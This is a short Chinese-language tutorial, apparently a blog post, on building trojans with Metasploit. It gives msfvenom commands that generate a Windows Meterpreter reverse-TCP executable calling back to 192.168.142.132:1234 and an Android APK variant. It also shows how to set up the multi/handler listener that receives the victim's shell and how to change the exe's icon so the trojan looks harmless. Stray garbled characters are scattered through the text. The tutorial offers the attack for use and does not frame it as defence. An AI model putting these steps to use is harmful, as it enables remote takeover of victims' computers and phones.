0x01
msf生成木馬exe,靶機(jī)打開中招。
1蜂厅、msf生成木馬exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.132 LPORT=1234 -f exe -o shell.exe
發(fā)送到目標(biāo)機(jī)器绊率。
擴(kuò)展:msf可以生成很多木馬,手機(jī)的也可以棠赛。比如安卓的
msfvenom -p android/meterpreter/reverse_tcp LHOST=X LPORT=X > aaa.apk? ,接下來的就都一樣了
2、打開msf控制臺(tái)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
設(shè)置變量跟生成木馬的 IP 和 端口一致让蕾。
3、run或者exploit
4或听、靶機(jī)上打開shell.exe探孝,即可接收到shell
拿到shell后,可能有亂碼誉裆。? 輸入 chcp 65001? 可以解決顿颅。
今天2019/26,今天找到了更換exe文件圖標(biāo)的辦法足丢,需要兩個(gè)工具 IrfanView(1)將圖片轉(zhuǎn)換成ICO文件的工具粱腻。(2)將exe圖標(biāo)更換的工具 qiconchanger。主要還是qiconchanger工具斩跌。ICO文件從網(wǎng)上找或者從應(yīng)用文檔里找栖疑,或者用IrfanView 這個(gè)軟件做一個(gè)。
直接把木馬exe拖到這個(gè)框框里滔驶,再把ICO文件拖過來就行了遇革。但是需要exe和ICO在一個(gè)文檔里才能顯示出想要的效果。
吶=腋狻萝快!下面是我做的
0x02
nc
參考網(wǎng)站:http://www.reibang.com/p/c1ffb563db4e